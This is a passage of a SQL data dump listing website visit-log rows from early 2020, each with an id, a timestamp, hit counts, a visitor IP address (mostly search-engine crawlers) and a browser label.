,0,'178.154.171.127','other'),(477819,1580338605,1,1,0,0,'157.55.39.86','other'),(477820,1580339721,1,1,0,0,'157.55.39.131','other'),(477821,1580340424,2,2,0,0,'157.55.39.86','other'),(477822,1580340666,1,1,0,0,'178.154.171.134','other'),(477823,1580341642,1,1,0,0,'66.249.64.28','chrome'),(477824,1580341837,1,1,0,0,'157.55.39.86','other'),(477825,1580342430,1,1,0,0,'178.154.171.134','other'),(477826,1580342886,1,1,0,0,'157.55.39.131','other'),(477827,1580343090,1,1,0,0,'157.55.39.86','other'),(477828,1580343417,1,1,0,0,'141.8.132.37','other'),(477829,1580343442,1,1,0,0,'178.154.171.134','other'),(477830,1580343512,1,1,0,0,'66.249.64.28','chrome'),(477831,1580344766,1,1,0,0,'178.154.171.134','other'),(477832,1580345715,1,1,0,0,'62.205.134.182','other'),(477833,1580346369,1,1,0,0,'178.154.171.134','other'),(477834,1580346460,1,1,0,0,'8.29.198.27','other'),(477835,1580346816,1,1,0,0,'66.249.64.27','chrome'),(477836,1580348328,1,1,0,0,'8.29.198.26','other'),(477837,1580348768,1,1,0,0,'157.55.39.160','other'),(477838,1580348793,1,1,0,0,'178.154.171.134','other'),(477839,1580350656,2,2,0,0,'157.55.39.160','other'),(477840,1580350912,1,1,0,0,'91.209.11.236','other'),(477841,1580351178,1,0,1,0,'66.249.64.28',''),(477842,1580351180,1,1,0,0,'66.249.64.28','chrome'),(477843,1580351419,1,1,0,0,'178.154.171.127','other'),(477844,1580351749,1,0,1,0,'66.249.64.26',''),(477845,1580353864,3,3,0,0,'157.55.39.160','other'),(477846,1580353901,1,1,0,0,'66.249.64.27','chrome'),(477847,1580354158,1,1,0,0,'178.154.171.134','other'),(477848,1580354307,1,1,0,0,'66.249.64.26','chrome'),(477849,1580357414,1,1,0,0,'8.29.198.27','other'),(477850,1580358330,1,1,0,0,'141.8.142.2','other'),(477851,1580358367,2,2,0,0,'178.154.171.127','other'),(477852,1580358377,1,1,0,0,'162.213.39.45','chrome'),(477853,1580358447,1,1,0,0,'178.154.171.134','other'),(477854,1580358485,1,1,0,0,'91.196.178.139','firefox'),(477855,1580359295,1,1,0,0,'8.29.198.25','other'),(477856,1580359619,1,1,0,0,'207.46.13.202','other'),(477857,1580359887,1,1,0,0,'178.154.171.127','other'),(477858,1580360215,1,1,0,0,'66.249.64.26','chrome'),(477859,1580362506,1,1,0,0,'51.68.152.26','chrome'),(477860,1580363209,1,1,0,0,'62.205.134.182','other'),(477861,1580364145,1,1,0,0,'66.249.64.26','chrome'),(477862,1580364661,1,1,0,0,'165.22.24.71','other'),(477863,1580364939,1,1,0,0,'207.46.13.202','other'),(477864,1580365469,1,1,0,0,'141.8.142.2','other'),(477865,1580366315,1,1,0,0,'91.196.178.183','chrome'),(477866,1580367143,1,1,0,0,'91.196.178.58','chrome'),(477867,1580367169,1,1,0,0,'178.154.171.134','other'),(477868,1580367437,1,1,0,0,'207.46.13.2','other'),(477869,1580368362,1,1,0,0,'8.29.198.27','other'),(477870,1580368435,1,1,0,0,'157.55.39.233','other'),(477871,1580369393,1,0,1,0,'66.249.70.33',''),(477872,1580369944,2,2,0,0,'207.46.13.241','other'),(477873,1580370225,1,1,0,0,'8.29.198.26','other'),(477874,1580370742,1,1,0,0,'66.249.64.28','chrome'),(477875,1580371348,1,1,0,0,'157.55.39.233','other'),(477876,1580371652,1,1,0,0,'64.225.29.240','other'),(477877,1580371906,1,1,0,0,'157.55.39.191','other'),(477878,1580374540,1,1,0,0,'91.196.178.93','chrome'),(477879,1580374564,2,2,0,0,'40.70.74.217','firefox'),(477880,1580374688,1,1,0,0,'66.249.64.27','chrome'),(477881,1580375743,1,1,0,0,'178.154.171.134','other'),(477882,1580377100,1,1,0,0,'46.219.204.9','chrome'),(477883,1580377831,1,1,0,0,'178.154.171.134','other'),(477884,1580377902,1,1,0,0,'34.238.248.140','chrome'),(477885,1580378096,1,1,0,0,'66.249.64.26','chrome'),(477886,1580378461,1,1,0,0,'46.200.189.244','chrome'),(477887,1580379238,2,2,0,0,'91.196.177.46','chrome'),(477888,1580379303,1,1,0,0,'8.29.198.26','other'),(477889,1580379597,1,1,0,0,'178.154.171.134','other'),(477890,1580380405,1,1,0,0,'91.196.178.183','chrome'),(477891,1580380519,1,1,0,0,'207.46.13.207','other'),(477892,1580380833,1,1,0,0,'93.74.89.103','chrome'),(477893,1580381166,1,1,0,0,'8.29.198.25','other'),(477894,1580382037,1,1,0,0,'207.46.13.204','other'),(477895,1580382359,3,3,0,0,'88.99.2.203','other'),(477897,1580382636,1,1,0,0,'91.196.178.93','chrome'),(477898,1580382649,2,2,0,0,'136.243.70.68','other'),(477899,1580383681,1,1,0,0,'207.46.13.132','other'),(477900,1580383896,1,1,0,0,'207.46.13.82','other'),(477901,1580384250,1,1,0,0,'109.74.154.72','chrome'),(477902,1580384426,2,2,0,0,'167.99.211.55','chrome'),(477903,1580384585,2,2,0,0,'213.87.130.254','chrome'),(477904,1580385225,1,1,0,0,'66.249.64.26','chrome'),(477905,1580386761,1,1,0,0,'91.196.178.80','chrome'),(477906,1580388247,1,1,0,0,'66.249.64.27','chrome'),(477907,1580388533,1,1,0,0,'66.249.64.26','chrome'),(477908,1580389220,1,1,0,0,'207.46.13.82','other'),(477909,1580389521,1,1,0,0,'91.196.177.46','chrome'),(477910,1580389996,1,1,0,0,'195.154.87.159','firefox'),(477911,1580390234,1,1,0,0,'178.154.171.127','other'),(477912,1580390241,1,1,0,0,'8.29.198.27','other'),(477913,1580390530,1,1,0,0,'178.154.171.134','other'),(477914,1580391240,1,1,0,0,'91.196.178.165','chrome'),(477915,1580392086,1,1,0,0,'8.29.198.25','other'),(477916,1580392442,1,1,0,0,'206.189.92.18','firefox'),(477917,1580392958,1,1,0,0,'37.54.114.126','chrome'),(477918,1580393172,1,1,0,0,'141.8.183.15','other'),(477919,1580393224,1,1,0,0,'141.8.142.164','other'),(477920,1580393405,1,1,0,0,'66.249.64.28','chrome'),(477921,1580393497,1,1,0,0,'141.8.142.119','other'),(477922,1580393537,1,1,0,0,'46.101.122.215','firefox'),(477923,1580393729,1,1,0,0,'91.196.178.165','chrome'),(477924,1580395704,1,1,0,0,'91.196.178.80','chrome'),(477925,1580395722,1,1,0,0,'91.196.178.71','chrome'),(477926,1580395724,1,1,0,0,'66.249.88.149','chrome'),(477927,1580395733,1,1,0,0,'66.249.83.199','chrome'),(477928,1580395918,1,1,0,0,'178.154.171.134','other'),(477929,1580396123,1,1,0,0,'91.196.178.153','firefox'),(477930,1580397115,1,1,0,0,'66.249.64.26','chrome'),(477931,1580397155,1,1,0,0,'141.8.142.2','other'),(477932,1580397159,1,1,0,0,'178.154.171.127','other'),(477933,1580397443,1,1,0,0,'178.154.171.134','other'),(477934,1580397459,1,1,0,0,'176.96.134.161','chrome'),(477935,1580398710,2,2,0,0,'40.87.87.194','other'),(477936,1580399642,1,1,0,0,'178.154.171.134','other'),(477937,1580400990,1,1,0,0,'178.154.171.127','other'),(477938,1580401014,1,1,0,0,'91.196.178.94','chrome'),(477939,1580401188,1,1,0,0,'8.29.198.27','other'),(477940,1580401891,1,1,0,0,'31.13.127.11','other'),(477941,1580401892,2,2,0,0,'31.13.127.13','other'),(477943,1580403012,1,1,0,0,'8.29.198.26','other'),(477944,1580405319,1,1,0,0,'66.249.64.28','chrome'),(477945,1580406071,1,1,0,0,'91.196.178.82','firefox'),(477946,1580406118,1,1,0,0,'46.211.151.138','chrome'),(477947,1580406391,1,1,0,0,'207.46.13.207','other'),(477948,1580407407,1,1,0,0,'178.154.171.134','other'),(477949,1580407515,1,1,0,0,'66.249.64.27','chrome'),(477950,1580408686,1,1,0,0,'66.249.64.26','chrome'),(477951,1580408689,1,1,0,0,'66.249.64.28','chrome'),(477952,1580408819,1,1,0,0,'66.249.70.36','chrome'),(477953,1580408820,1,1,0,0,'46.211.151.103','chrome'),(477954,1580410128,1,1,0,0,'178.154.171.134','other'),(477955,1580411001,1,1,0,0,'54.208.102.37','other'),(477956,1580411003,1,1,0,0,'107.21.1.8','other'),(477957,1580411493,1,1,0,0,'66.249.64.28','chrome'),(477958,1580412163,1,1,0,0,'8.29.198.27','other'),(477959,1580413586,1,1,0,0,'178.154.171.134','other'),(477960,1580413896,1,1,0,0,'66.249.70.33','chrome'),(477961,1580413940,1,1,0,0,'8.29.198.25','other'),(477962,1580414462,1,1,0,0,'91.196.178.26','chrome'),(477963,1580415134,1,1,0,0,'91.196.178.15','chrome'),(477964,1580415277,1,1,0,0,'178.154.171.134','other'),(477965,1580415321,1,1,0,0,'178.154.171.127','other'),(477966,1580416602,2,2,0,0,'91.196.178.26','chrome'),(477967,1580418408,1,1,0,0,'94.178.98.146','chrome'),(477968,1580421579,1,1,0,0,'178.154.171.127','other'),(477969,1580421636,1,1,0,0,'207.46.13.211','other'),(477970,1580422920,1,1,0,0,'141.8.142.2','other'),(477971,1580423114,1,1,0,0,'8.29.198.25','other'),(477972,1580423699,1,1,0,0,'178.154.171.134','other'),(477973,1580423854,1,1,0,0,'31.13.127.7','other'),(477974,1580423855,2,2,0,0,'31.13.127.3','other'),(477976,1580424898,1,1,0,0,'8.29.198.26','other'),(477977,1580427428,1,1,0,0,'207.46.13.211','other'),(477978,1580427444,1,1,0,0,'17.58.101.25','other'),(477979,1580427481,1,1,0,0,'178.154.171.134','other'),(477980,1580432113,1,1,0,0,'62.205.134.182','other'),(477981,1580434060,1,1,0,0,'8.29.198.25','other'),(477982,1580434766,1,1,0,0,'207.46.13.60','other'),(477983,1580435264,5,5,0,0,'207.46.13.211','other'),(477984,1580435399,1,1,0,0,'66.249.64.28','chrome'),(477985,1580435816,1,1,0,0,'8.29.198.27','other'),(477986,1580438299,1,1,0,0,'178.154.171.134','other'),(477987,1580439162,1,1,0,0,'92.53.105.39','chrome'),(477988,1580439171,1,1,0,0,'207.46.13.60','other'),(477989,1580443234,1,1,0,0,'178.154.171.134','other'),(477990,1580443954,1,1,0,0,'207.46.13.60','other'),(477991,1580444384,1,1,0,0,'94.178.147.163','chrome'),(477992,1580444965,1,1,0,0,'8.29.198.27','other'),(477993,1580446474,1,1,0,0,'66.249.64.26','chrome'),(477994,1580446726,1,1,0,0,'8.29.198.26','other'),(477995,1580447580,1,1,0,0,'207.46.13.211','other'),(477996,1580449457,1,1,0,0,'62.205.134.182','other'),(477997,1580450731,1,1,0,0,'95.134.182.233','chrome'),(477998,1580451152,1,1,0,0,'93.73.158.38','chrome'),(477999,1580451276,1,0,1,0,'66.249.64.26',''),(478000,1580451290,2,2,0,0,'66.249.64.26','chrome'),(478001,1580451522,1,1,0,0,'178.154.171.134','other'),(478002,1580451731,1,1,0,0,'207.46.13.60','other'),(478003,1580453030,1,1,0,0,'66.249.64.27','chrome'),(478004,1580454286,1,1,0,0,'66.249.64.27','chrome'),(478005,1580455302,1,1,0,0,'66.249.64.26','chrome'),(478006,1580455308,1,1,0,0,'91.196.178.84','firefox'),(478007,1580455580,1,1,0,0,'5.58.204.66','opera'),(478008,1580455737,1,0,1,0,'66.249.64.28',''),(478009,1580455910,1,1,0,0,'8.29.198.25','other'),(478010,1580457661,1,1,0,0,'8.29.198.25','other'),(478011,1580458865,1,1,0,0,'2.93.4.39','other'),(478012,1580459145,1,1,0,0,'216.144.230.233','msie'),(478013,1580460839,1,1,0,0,'66.249.64.27','chrome'),(478014,1580462109,2,2,0,0,'95.133.132.25','chrome'),(478015,1580462587,1,1,0,0,'5.45.207.65','other'),(478016,1580462646,1,1,0,0,'207.46.13.60','other'),(478017,1580463279,1,1,0,0,'178.154.171.134','other'),(478018,1580463756,1,1,0,0,'18.216.128.203','chrome'),(478019,1580464048,1,1,0,0,'91.196.178.184','chrome'),(478020,1580464171,2,2,0,0,'91.196.178.183','chrome'),(478021,1580464642,1,1,0,0,'178.154.171.127','other'),(478022,1580464993,1,1,0,0,'178.154.171.134','other'),(478023,1580465733,2,2,0,0,'95.133.132.25','chrome'),(478024,1580466034,1,1,0,0,'91.196.178.183','chrome'),(478025,1580466837,1,1,0,0,'8.29.198.27','other'),(478026,1580467180,1,1,0,0,'91.196.177.241','chrome'),(478027,1580467667,1,1,0,0,'66.249.64.26','chrome'),(478028,1580468567,1,1,0,0,'8.29.198.27','other'),(478029,1580468778,175,175,0,0,'5.9.70.117','other'),(478030,1580469131,2,2,0,0,'207.46.13.60','other'),(478031,1580469680,12,12,0,0,'5.9.70.117','other'),(478032,1580470155,1,1,0,0,'178.154.171.134','other'),(478033,1580470418,1,1,0,0,'109.74.154.72','chrome'),(478034,1580471221,1,1,0,0,'66.249.64.27','chrome'),(478035,1580472215,1,1,0,0,'207.46.13.211','other'),(478036,1580473318,1,1,0,0,'213.180.203.170','other'),(478037,1580475007,1,1,0,0,'195.10.210.70','chrome'),(478038,1580475202,1,1,0,0,'91.196.178.144','firefox'),(478039,1580475395,1,1,0,0,'178.154.171.134','other'),(478040,1580476063,2,2,0,0,'91.196.178.47','chrome'),(478041,1580476440,1,1,0,0,'91.196.177.46','chrome'),(478042,1580477754,1,1,0,0,'8.29.198.26','other'),(478043,1580477837,1,1,0,0,'31.13.127.8','other'),(478044,1580477838,1,1,0,0,'31.13.127.5','other'),(478047,1580478099,2,2,0,0,'18.197.53.120','firefox'),(478048,1580478616,1,1,0,0,'66.249.64.28','chrome'),(478049,1580478937,1,1,0,0,'91.196.178.183','chrome'),(478050,1580479536,1,1,0,0,'8.29.198.25','other'),(478051,1580479618,1,0,1,0,'207.46.13.60',''),(478052,1580479622,1,1,0,0,'207.46.13.60','other'),(478053,1580479962,3,3,0,0,'52.14.120.164','chrome'),(478054,1580480405,1,1,0,0,'37.53.73.6','chrome'),(478055,1580481448,1,1,0,0,'37.53.73.6','chrome'),(478056,1580482277,2,2,0,0,'207.46.13.9','other'),(478057,1580483509,1,1,0,0,'66.249.64.27','chrome'),(478058,1580484700,2,2,0,0,'178.154.171.134','other'),(478059,1580485269,1,1,0,0,'66.249.64.27','chrome'),(478060,1580486412,2,2,0,0,'207.46.13.60','other'),(478061,1580486603,1,0,1,0,'207.46.13.9',''),(478062,1580487074,1,1,0,0,'141.8.132.19','other'),(478063,1580488685,1,1,0,0,'8.29.198.25','other'),(478064,1580488779,1,1,0,0,'178.154.171.134','other'),(478065,1580490140,1,1,0,0,'66.249.64.26','chrome'),(478066,1580490510,1,1,0,0,'8.29.198.27','other'),(478067,1580490620,1,1,0,0,'178.154.171.134','other'),(478068,1580491635,1,1,0,0,'91.196.178.90','firefox'),(478069,1580492214,1,1,0,0,'178.154.171.134','other'),(478070,1580493382,2,2,0,0,'207.46.13.9','other'),(478071,1580493670,1,1,0,0,'209.17.96.226','other'),(478072,1580493800,2,2,0,0,'178.154.171.134','other'),(478073,1580494080,1,1,0,0,'157.55.39.128','other'),(478074,1580495511,1,1,0,0,'178.154.171.134','other'),(478075,1580496206,1,1,0,0,'13.66.139.0','other'),(478076,1580496848,2,2,0,0,'207.46.13.211','other'),(478077,1580497296,2,0,2,0,'207.46.13.231',''),(478078,1580497782,1,1,0,0,'178.154.171.134','other'),(478079,1580497886,1,1,0,0,'37.52.23.130','chrome'),(478080,1580498086,1,1,0,0,'207.46.13.86','other'),(478081,1580498377,1,1,0,0,'207.46.13.9','other'),(478082,1580499698,1,1,0,0,'8.29.198.25','other'),(478083,1580499739,3,3,0,0,'207.180.234.126','other'),(478084,1580499897,1,1,0,0,'207.46.13.86','other'),(478085,1580500017,1,1,0,0,'207.46.13.231','other'),(478086,1580500139,1,1,0,0,'141.8.142.119','other'),(478087,1580501273,1,1,0,0,'207.46.13.86','other'),(478088,1580501339,185,185,0,0,'144.76.3.79','other'),(478089,1580501506,1,1,0,0,'8.29.198.26','other'),(478090,1580501570,1,1,0,0,'178.154.171.127','other'),(478091,1580501590,1,1,0,0,'178.154.171.134','other'),(478092,1580502077,1,0,1,0,'207.46.13.9',''),(478093,1580502495,30,30,0,0,'207.180.234.126','other'),(478094,1580502550,5,5,0,0,'144.76.96.236','other'),(478095,1580502803,1,1,0,0,'62.102.148.69','firefox'),(478096,1580503409,32,32,0,0,'207.180.234.126','other'),(478097,1580503439,1,0,1,0,'207.46.13.9',''),(478098,1580504105,2,2,0,0,'178.154.171.134','other'),(478099,1580504184,1,1,0,0,'207.46.13.231','other'),(478100,1580504615,16,16,0,0,'144.76.96.236','other'),(478101,1580504899,1,1,0,0,'66.249.64.26','chrome'),(478102,1580505418,1,1,0,0,'178.154.171.134','other'),(478103,1580505617,1,1,0,0,'207.46.13.9','other'),(478104,1580506336,2,2,0,0,'31.13.115.10','other'),(478105,1580506643,1,1,0,0,'141.8.142.2','other'),(478106,1580507237,1,1,0,0,'178.154.171.127','other'),(478107,1580507644,2,2,0,0,'157.55.39.196','other'),(478108,1580508736,1,1,0,0,'46.211.131.101','chrome'),(478109,1580508903,1,1,0,0,'207.46.13.86','other'),(478110,1580510022,1,1,0,0,'207.46.13.231','other'),(478111,1580510063,2,2,0,0,'207.46.13.9','other'),(478112,1580510404,1,1,0,0,'66.249.70.33','chrome'),(478113,1580510645,1,1,0,0,'8.29.198.26','other'),(478114,1580511217,1,1,0,0,'5.45.207.65','other'),(478115,1580512162,1,0,1,0,'207.46.13.231',''),(478116,1580512458,1,1,0,0,'8.29.198.26','other'),(478117,1580512593,2,2,0,0,'207.46.13.9','other'),(478118,1580512903,2,2,0,0,'178.154.171.134','other'),(478119,1580513307,1,1,0,0,'178.159.37.88','chrome'),(478120,1580514031,1,1,0,0,'157.55.39.196','other'),(478121,1580514466,1,1,0,0,'91.196.178.145','chrome'),(478122,1580514776,1,1,0,0,'207.46.13.9','other'),(478123,1580514943,1,1,0,0,'66.249.64.26','chrome'),(478124,1580515061,1,1,0,0,'157.55.39.196','other'),(478125,1580516105,1,1,0,0,'207.46.13.86','other'),(478126,1580516227,2,2,0,0,'178.154.171.134','other'),(478127,1580516849,1,1,0,0,'5.45.207.65','other'),(478128,1580518412,1,1,0,0,'207.46.13.86','other'),(478129,1580518514,1,1,0,0,'62.205.134.182','other'),(478130,1580519085,1,1,0,0,'178.154.171.134','other'),(478131,1580519144,1,1,0,0,'207.46.13.9','other'),(478132,1580519782,2,2,0,0,'185.105.118.7','chrome'),(478133,1580520376,1,1,0,0,'209.17.96.218','other'),(478134,1580520699,2,2,0,0,'207.46.13.9','other'),(478135,1580520924,1,1,0,0,'141.8.142.161','other'),(478136,1580521584,1,1,0,0,'8.29.198.26','other'),(478137,1580522307,1,1,0,0,'178.154.171.134','other'),(478138,1580522884,1,1,0,0,'66.249.70.33','chrome'),(478139,1580523395,1,1,0,0,'8.29.198.25','other'),(478140,1580523631,2,2,0,0,'207.46.13.231','other'),(478141,1580524255,1,1,0,0,'141.8.142.161','other'),(478142,1580525224,1,1,0,0,'157.55.39.196','other'),(478143,1580525494,1,1,0,0,'66.249.64.27','chrome'),(478144,1580526517,1,1,0,0,'141.8.183.53','other'),(478145,1580526629,1,1,0,0,'5.45.207.49','other'),(478146,1580526634,2,2,0,0,'207.46.13.9','other'),(478147,1580526998,1,1,0,0,'207.46.13.86','other'),(478148,1580527921,1,1,0,0,'66.249.64.27','chrome'),(478149,1580528527,1,1,0,0,'157.55.39.196','other'),(478150,1580529235,1,1,0,0,'207.46.13.9','other'),(478151,1580529724,1,1,0,0,'207.46.13.231','other'),(478152,1580530437,1,1,0,0,'207.46.13.86','other'),(478153,1580531845,1,1,0,0,'207.46.13.86','other'),(478154,1580532485,1,1,0,0,'8.29.198.25','other'),(478155,1580532849,2,2,0,0,'207.46.13.86','other'),(478156,1580533460,1,1,0,0,'207.46.13.9','other'),(478157,1580534347,1,1,0,0,'8.29.198.27','other'),(478158,1580535404,1,1,0,0,'207.46.13.86','other'),(478159,1580535423,2,2,0,0,'178.154.171.134','other'),(478160,1580536382,1,1,0,0,'62.205.134.182','other'),(478161,1580537041,2,2,0,0,'207.46.13.231','other'),(478162,1580537645,1,1,0,0,'141.8.183.73','other'),(478163,1580537648,2,2,0,0,'207.46.13.9','other'),(478164,1580538908,1,1,0,0,'178.154.171.134','other'),(478165,1580539312,1,1,0,0,'207.46.13.231','other'),(478166,1580539966,2,2,0,0,'207.46.13.86','other'),(478167,1580540590,1,1,0,0,'91.196.178.15','chrome'),(478168,1580541960,1,1,0,0,'66.249.64.26','chrome'),(478169,1580541961,1,1,0,0,'66.249.64.27','chrome'),(478170,1580542041,2,2,0,0,'207.46.13.9','other'),(478171,1580542212,1,1,0,0,'207.46.13.231','other'),(478172,1580542729,2,2,0,0,'157.55.39.196','other'),(478173,1580543390,1,1,0,0,'8.29.198.27','other'),(478174,1580543896,1,1,0,0,'37.9.113.177','other'),(478175,1580544193,1,1,0,0,'66.249.64.28','chrome'),(478176,1580544880,1,1,0,0,'207.46.13.86','other'),(478177,1580545287,1,1,0,0,'8.29.198.26','other'),(478178,1580545462,3,3,0,0,'207.46.13.231','other'),(478179,1580545804,1,1,0,0,'207.46.13.9','other'),(478180,1580546993,1,1,0,0,'66.249.64.26','chrome'),(478181,1580547129,1,1,0,0,'157.55.39.196','other'),(478182,1580547540,1,1,0,0,'141.8.142.86','other'),(478183,1580548020,1,1,0,0,'207.46.13.231','other'),(478184,1580548349,2,2,0,0,'207.46.13.9','other'),(478185,1580548474,2,2,0,0,'178.154.171.134','other'),(478186,1580550369,1,1,0,0,'207.46.13.9','other'),(478187,1580550490,1,1,0,0,'207.46.13.86','other'),(478188,1580550982,1,1,0,0,'66.249.64.28','chrome'),(478189,1580550998,1,1,0,0,'66.249.70.33','chrome'),(478190,1580551036,1,1,0,0,'178.154.171.127','other'),(478191,1580551365,1,0,1,0,'207.46.13.231',''),(478192,1580551408,1,1,0,0,'46.133.177.83','chrome'),(478193,1580551845,1,1,0,0,'207.46.13.231','other'),(478194,1580552085,2,2,0,0,'178.154.171.134','other'),(478195,1580553922,1,1,0,0,'178.154.171.127','other'),(478196,1580554100,2,2,0,0,'207.46.13.9','other'),(478197,1580554303,1,1,0,0,'8.29.198.27','other'),(478198,1580554442,1,1,0,0,'95.108.213.3','other'),(478199,1580554983,2,2,0,0,'178.154.171.127','other'),(478200,1580555181,1,1,0,0,'178.154.171.134','other'),(478201,1580555491,1,1,0,0,'207.46.13.86','other'),(478202,1580555746,3,3,0,0,'207.46.13.9','other'),(478203,1580555765,1,1,0,0,'109.74.154.72','chrome'),(478204,1580556219,1,1,0,0,'8.29.198.27','other'),(478205,1580556297,1,1,0,0,'66.249.70.62','chrome'),(478206,1580556880,2,2,0,0,'207.46.13.86','other'),(478207,1580557015,1,1,0,0,'141.8.188.25','other'),(478208,1580557222,1,1,0,0,'207.46.13.9','other'),(478209,1580558103,1,1,0,0,'66.249.64.28','chrome'),(478210,1580558156,1,1,0,0,'66.249.64.27','chrome'),(478211,1580558190,1,1,0,0,'94.153.108.69','chrome'),(478212,1580559026,1,1,0,0,'157.55.39.196','other'),(478213,1580559111,1,1,0,0,'207.46.13.9','other'),(478214,1580559473,1,1,0,0,'207.46.13.86','other'),(478215,1580560113,2,2,0,0,'207.46.13.9','other'),(478216,1580560391,2,1,1,0,'207.46.13.86',''),(478217,1580561169,2,1,1,0,'207.46.13.231',''),(478218,1580561297,2,2,0,0,'157.55.39.196','other'),(478219,1580561420,1,1,0,0,'66.249.64.27','chrome'),(478220,1580561500,1,1,0,0,'178.154.171.134','other'),(478221,1580562713,1,1,0,0,'157.55.39.196','other'),(478222,1580563777,2,2,0,0,'40.87.87.194','other'),(478223,1580563951,1,1,0,0,'95.108.213.61','other'),(478224,1580564911,1,1,0,0,'66.249.64.26','chrome'),(478225,1580565198,1,1,0,0,'8.29.198.26','other'),(478226,1580565212,1,1,0,0,'207.46.13.231','other'),(478227,1580565973,2,2,0,0,'207.46.13.86','other'),(478228,1580566268,1,1,0,0,'157.55.39.196','other'),(478229,1580567142,1,1,0,0,'8.29.198.25','other'),(478230,1580567282,1,1,0,0,'37.9.113.200','other'),(478231,1580568361,1,0,1,0,'66.249.64.27',''),(478233,1580568545,1,0,1,0,'66.249.64.28',''),(478234,1580568550,1,1,0,0,'66.249.64.27','chrome'),(478235,1580569926,1,1,0,0,'37.9.113.200','other'),(478236,1580569977,1,1,0,0,'35.180.232.6','other'),(478237,1580571394,3,3,0,0,'35.238.0.98','chrome'),(478238,1580571461,3,3,0,0,'34.68.32.163','chrome'),(478239,1580571474,2,2,0,0,'34.66.104.151','chrome'),(478241,1580571492,7,7,0,0,'34.67.82.99','chrome'),(478242,1580571761,2,2,0,0,'207.46.13.9','other'),(478243,1580572066,1,1,0,0,'37.9.113.39','other'),(478244,1580573117,1,1,0,0,'207.46.13.231','other'),(478245,1580573531,1,1,0,0,'66.249.64.28','chrome'),(478246,1580574560,3,3,0,0,'157.55.39.196','other'),(478247,1580575770,1,1,0,0,'207.46.13.9','other'),(478248,1580576130,1,1,0,0,'8.29.198.25','other'),(478249,1580577115,1,1,0,0,'157.55.39.196','other'),(478250,1580577303,1,1,0,0,'207.46.13.9','other'),(478251,1580578086,1,1,0,0,'8.29.198.25','other'),(478252,1580579157,2,2,0,0,'157.55.39.196','other'),(478253,1580581679,1,1,0,0,'157.55.39.196','other'),(478254,1580581713,1,1,0,0,'207.46.13.9','other'),(478255,1580583235,1,1,0,0,'207.46.13.231','other'),(478256,1580584015,1,1,0,0,'207.46.13.86','other'),(478257,1580584711,1,1,0,0,'157.55.39.196','other'),(478258,1580585551,1,1,0,0,'141.8.132.37','other'),(478259,1580585664,1,1,0,0,'141.8.142.115','other'),(478260,1580586390,1,1,0,0,'207.46.13.231','other'),(478261,1580586726,1,1,0,0,'141.8.142.177','other'),(478262,1580586850,1,1,0,0,'141.8.132.28','other'),(478263,1580586940,2,0,2,0,'207.46.13.9',''),(478264,1580587052,1,1,0,0,'8.29.198.25','other'),(478265,1580587730,9,9,0,0,'107.175.156.144','other'),(478266,1580587846,1,1,0,0,'13.48.85.19','other'),(478267,1580588204,1,1,0,0,'207.46.13.86','other'),(478268,1580588553,1,1,0,0,'141.8.183.67','other'),(478269,1580589016,1,1,0,0,'8.29.198.25','other'),(478270,1580589595,1,1,0,0,'157.55.39.196','other'),(478271,1580589900,1,1,0,0,'141.8.188.66','other'),(478272,1580590476,1,1,0,0,'66.249.64.26','chrome'),(478273,1580592046,1,1,0,0,'157.55.39.196','other'),(478274,1580592670,1,1,0,0,'62.210.124.220','other'),(478275,1580592890,1,1,0,0,'207.46.13.86','other'),(478276,1580593523,2,2,0,0,'91.196.178.80','chrome'),(478277,1580594827,1,1,0,0,'46.219.204.8','firefox'),(478278,1580595508,1,1,0,0,'141.8.142.115','other'),(478279,1580595868,1,1,0,0,'141.8.142.128','other'),(478280,1580595997,1,1,0,0,'37.9.113.142','other'),(478281,1580596022,1,1,0,0,'207.46.13.86','other'),(478282,1580597793,1,1,0,0,'95.108.213.3','other'),(478283,1580597853,1,1,0,0,'66.249.64.27','chrome'),(478284,1580597934,1,1,0,0,'8.29.198.25','other'),(478285,1580597972,1,1,0,0,'157.55.39.196','other'),(478286,1580598080,2,0,2,0,'207.46.13.231',''),(478287,1580598359,1,1,0,0,'35.180.136.86','other'),(478288,1580598998,1,1,0,0,'165.22.97.94','firefox'),(478289,1580599650,1,1,0,0,'3.228.14.242','chrome'),(478290,1580599937,1,1,0,0,'8.29.198.27','other'),(478291,1580601213,1,1,0,0,'141.8.183.33','other'),(478292,1580601494,1,1,0,0,'193.106.30.99','firefox'),(478293,1580604419,2,0,2,0,'207.46.13.9',''),(478294,1580604914,1,1,0,0,'62.205.134.182','other'),(478295,1580605445,1,1,0,0,'141.8.183.18','other'),(478296,1580607997,1,1,0,0,'66.249.64.28','chrome'),(478297,1580608826,1,1,0,0,'8.29.198.25','other'),(478298,1580609779,1,1,0,0,'207.46.13.231','other'),(478299,1580609879,1,1,0,0,'66.249.64.26','chrome'),(478300,1580610288,1,1,0,0,'157.55.39.196','other'),(478301,1580610876,1,1,0,0,'8.29.198.26','other'),(478302,1580610951,1,1,0,0,'46.211.131.1','chrome'),(478303,1580613520,1,1,0,0,'66.249.64.28','chrome'),(478304,1580615002,1,1,0,0,'95.108.181.103','other'),(478305,1580615372,1,1,0,0,'66.249.64.26','chrome'),(478306,1580615551,1,1,0,0,'66.249.70.36','chrome'),(478307,1580615680,1,1,0,0,'66.249.64.28','chrome'),(478308,1580616037,1,1,0,0,'157.55.39.196','other'),(478309,1580616337,3,3,0,0,'207.46.13.9','other'),(478310,1580616355,2,2,0,0,'207.46.13.231','other'),(478311,1580616540,1,1,0,0,'141.8.132.37','other'),(478312,1580617763,1,1,0,0,'207.46.13.9','other'),(478313,1580618409,1,1,0,0,'51.15.61.228','chrome'),(478314,1580618976,1,1,0,0,'207.46.13.86','other'),(478315,1580619413,2,2,0,0,'157.55.39.196','other'),(478316,1580619706,1,1,0,0,'8.29.198.26','other'),(478317,1580621117,1,1,0,0,'207.46.13.231','other'),(478318,1580621590,1,1,0,0,'141.8.132.28','other'),(478319,1580621764,1,1,0,0,'8.29.198.27','other'),(478320,1580622041,1,1,0,0,'37.9.113.142','other'),(478321,1580622391,1,1,0,0,'62.205.134.182','other'),(478322,1580622467,1,1,0,0,'66.249.64.27','chrome'),(478323,1580622476,1,1,0,0,'207.46.13.9','other'),(478324,1580624137,1,1,0,0,'207.46.13.86','other'),(478325,1580624284,1,1,0,0,'178.154.171.7','other'),(478326,1580625909,1,1,0,0,'141.8.183.18','other'),(478327,1580626133,1,1,0,0,'66.249.64.26','chrome'),(478328,1580626302,1,0,1,0,'66.249.64.28',''),(478329,1580626345,1,1,0,0,'207.46.13.9','other'),(478330,1580627285,1,1,0,0,'141.8.132.28','other'),(478331,1580627769,1,1,0,0,'207.46.13.86','other'),(478332,1580628091,1,1,0,0,'37.9.113.142','other'),(478333,